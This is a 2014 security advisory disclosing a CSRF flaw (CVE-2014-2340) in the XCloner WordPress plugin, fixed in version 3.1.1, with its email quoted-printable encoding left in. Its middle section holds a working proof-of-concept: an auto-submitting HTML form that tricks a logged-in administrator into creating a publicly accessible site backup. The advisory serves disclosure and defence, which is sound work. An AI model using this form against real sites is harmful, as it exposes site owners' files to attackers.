Advisory ID: HTB23206 Product: XCloner Wordpress plugin Vendor: XCloner Vulnerable Version(s): 3.1.0 and probably prior Tested Version: 3.1.0 Advisory Publication: March 12, 2014 [without technical details] Vendor Notification: March 12, 2014=20 Vendor Patch: March 13, 2014=20 Public Disclosure: April 2, 2014=20 Vulnerability Type: Cross-Site Request Forgery [CWE-352] CVE Reference: CVE-2014-2340 Risk Level: Low=20 CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in XCloner = Wordpress plugin, which can be exploited to perform a CSRF attack and gain = access to a backed-up copy of vulnerable website. =D0=A1ross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-201= 4-2340 The vulnerability exists due to insufficient verification of HTTP request o= rigin. A remote attacker can trick a logged-in administrator to visit a spe= cially crafted webpage and create a website backup. Simple exploit code below will create new backup with all website files (no= SQL database), which will be publicly accessible on the http://[host]/admi= nistrator/backups/backup.tar URL:=20 <form action=3D"http://[host]/wp-admin/plugins.php?page=3Dxcloner_show&opti= on=3Dcom_cloner&task=3Dconfirm" method=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"dbbackup" value=3D"1"> <input type=3D"hidden" name=3D"dbbackup_comp" value=3D""> <input type=3D"hidden" name=3D"bname" value=3D"backup"> <input type=3D"hidden" name=3D"backupComments" value=3D""> <input type=3D"hidden" name=3D"option" value=3D"com_cloner"> <input type=3D"hidden" name=3D"task" value=3D"generate"> <input type=3D"hidden" name=3D"boxchecked" value=3D"0"> <input type=3D"hidden" name=3D"hidemainmenu" value=3D"0"> <input type=3D"hidden" name=3D"" value=3D""> <input type=3D"submit" name=3D"run" value=3D"run"> </form> <script> document.main.submit(); </script> ---------------------------------------------------------------------------= -------------------- Solution: Update to XCloner 3.1.1 More Information: http://www.xcloner.com/support/download/?did=3D9 ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23206 - https://www.htbridge.com/advisory/= HTB23206 - =D0=A1ross-Site Request Forgery (CSRF) in XCloner Wordpress Plug= in. [2] XCloner Wordpress plugin - http://www.xcloner.com - XCloner is a profes= sional website Backup and Restore application designed to allow you to crea= te safe complete backups of any PHP/Mysql website and to be able to restore= them anywhere. It works as a native Joomla backup component, as a native W= ordpress backup plugin and also as standalone PHP/Mysql backup application= =2E [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types. [5] ImmuniWeb=C2=AE - https://portal.htbridge.com/ - is High-Tech Bridge's = proprietary web application security assessment solution with SaaS delivery= model that combines manual and automated vulnerability testing. ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.